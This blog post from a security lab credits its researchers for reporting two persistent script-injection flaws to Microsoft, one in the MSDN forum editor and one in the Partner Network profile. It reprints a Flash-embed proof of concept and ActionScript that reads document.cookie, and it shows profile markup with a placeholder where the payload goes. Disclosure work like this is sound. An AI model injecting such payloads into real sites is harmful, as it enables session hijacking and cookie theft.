Security Researcher Acknowledgments [MOS] April – MSRC

Security Researcher Acknowledgments [MOS] April – MSRC

This month several people of our Research Team are listed again on the Microsoft Security Researcher Acknowledgments Page for Microsoft Online Services. Aditya Gupta, Subho Halder, Dev Kar & Benjamin Kunz Mejri also called "usual suspects" of laboratory discovered multiple web vulnerabilities like a persistent script code injection on the microsoft partner cloud service or a editor webkit vulnerability in MSDN Forum.

First we highlight the MSDN Flash Webkit Vulnerability by Aditya Gupta, Subho Halder & Dev Kar.

A persistent flash componente input validation vulnerability is detected on Microsofts MSDN Forum Service Application. The vulnerability allows an attacker to implement malicious persistent comments when the user is editing or posting through Flash. The vulnerability is located on the htmleditor input/output when processing to load manipualtes swf files which were created with flash action script.

Vulnerable Module(s): Comments & Edit - Flash Input/Output (Editor-HTML) [WebKit] MSRC ID#1: 12152 & MSRC ID#2: 12228

The vulnerability can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ...

1) Either comment or start a new thread (http://channel9.msdn.com/forum).

2) Click on the html button, through which you can enter html source directly "HTML Source editor"

3) Paste the exploit code: <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/xysecteam.swf" width="300" height="300"> <param name="movie" value="http://www.vuln-lab.com/hack.swf" /> <param name="quality" value="high" /> <param name="scale" value="noscale" /> <param name="salign" value="LT" /> <param name="allowScriptAccess" value="always" /> <param name="menu" value="false" /> </object>

4) Click on update, and the document.cookie pop ups in alert the vulnerable SWF is compiled from an ActionScript with the following code: class Main { static function main() { getURL('javascript:alert("VL Team "+document.cookie)'); } }

URL: http://www.vulnerability-lab.com/get_content.php?id=450

The second vulnerability was a persistent script code injection in the microsoft cloud partner service application. Multiple persistent input validation vulnerabilities are detected on Microsofts official Partner Network Application Service. The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script code (Application-Side). Successful exploitation with low required user inter action can result in session hijacking against admin, moderator & customer sessions or allows an attacker to manipulate requests via persistent script code inject. The vulnerability is located on the Company & Mobile Phone Number input fields of the microsoft partner network service application user profile.

Vulnerable Module(s):

[+] Company & Mobile Phone Number (Profile)

[+] Company Name Profile Listing The vulnerability has been discovered by Benjamin Kunz Mejri to the MSRC Team in April 2012. A researcher of the vulnerability-lab reproduced the issue in a new tech video.

URL: http://www.youtube.com/watch?v=_Zou2ZSiL6g

The vulnerability can be exploited by remote attackers with service user account. Exploitation requires low user, moderator or admin inter action. For demonstration or reproduce ... <div> <span id="displayPhoneLabel">Eingegebene Nummer:</span> </div> <div> <span id="displayPhoneLabel">>"<[MALICIOUS PERSISTENT SCRIPT CODE INJECT]"></span> </div> </div> <input id='countryHidden' type='hidden' value='250' /> <div class='row'> <div class='label'> <span id='countryRegionLabel'>Land/Region:</span> </div> <div class='entry'> ... or <tr xmlns="http://www.w3.org/1999/xhtml"> <td><img alt="" src="/PartnerProgram/WebResource.axd?d=-Tv3sV_xp32BwONeW9hUQo0fFWY-RDp2Doe-qePp16cPAoXfoy546q9RX-1OFMrOxzhCO3oAeAxwhGn1p4eUC6CYSYmmUfyVtrYNLpkxj_3KbQmv0&t=634607579700584141"/>&#8203;&#8203;&#8203;&#8203;&#8203;</td><td style="white-space: nowrap;" onmouseout="TreeView_UnhoverNode(this)" onmouseover="TreeView_HoverNode(ctl00_ctl00_ContentMain_ContentMain_location Hierarchy_locationHierarchyTreeView_TreeView_Data, this)"><a id="ctl00_ctl00_ContentMain_ContentMain_locationHierarchy_locationHierarchyTreeView_TreeViewt0" onclick="TreeView_SelectNode(ctl00_ctl00_ContentMain_ContentMain_locationHierarchy_location HierarchyTreeView_TreeView_Data, this,'ctl00_ctl00_ContentMain_ContentMain_locationHierarchy_locationHierarchyTreeView_TreeViewt0'); TreeView_FindStyleManager ByTreeNode(this.id).ChangeStyle(this.id);HierarchyControl_Find('ctl00_ctl00_ContentMain_ContentMain _locationHierarchy_ locationHierarchyTreeView').Select(this.id); SetSelectedValue('ctl00_ctl00_ContentMain_ContentMain_locationHierarchy_ selectedValue', this.id); EnableSelectButton('ctl00_ctl00_ContentMain_ContentMain_locationHierarchy_selectButton');" href="javascript:void(0)">[MALICIOUS PERSISTENT SCRIPT CODE INJECT] (HQ) (Hessen)</a>&#8203;&#8203;&#8203;&#8203;&#8203;</td> </tr>

URL: http://www.vulnerability-lab.com/get_content.php?id=433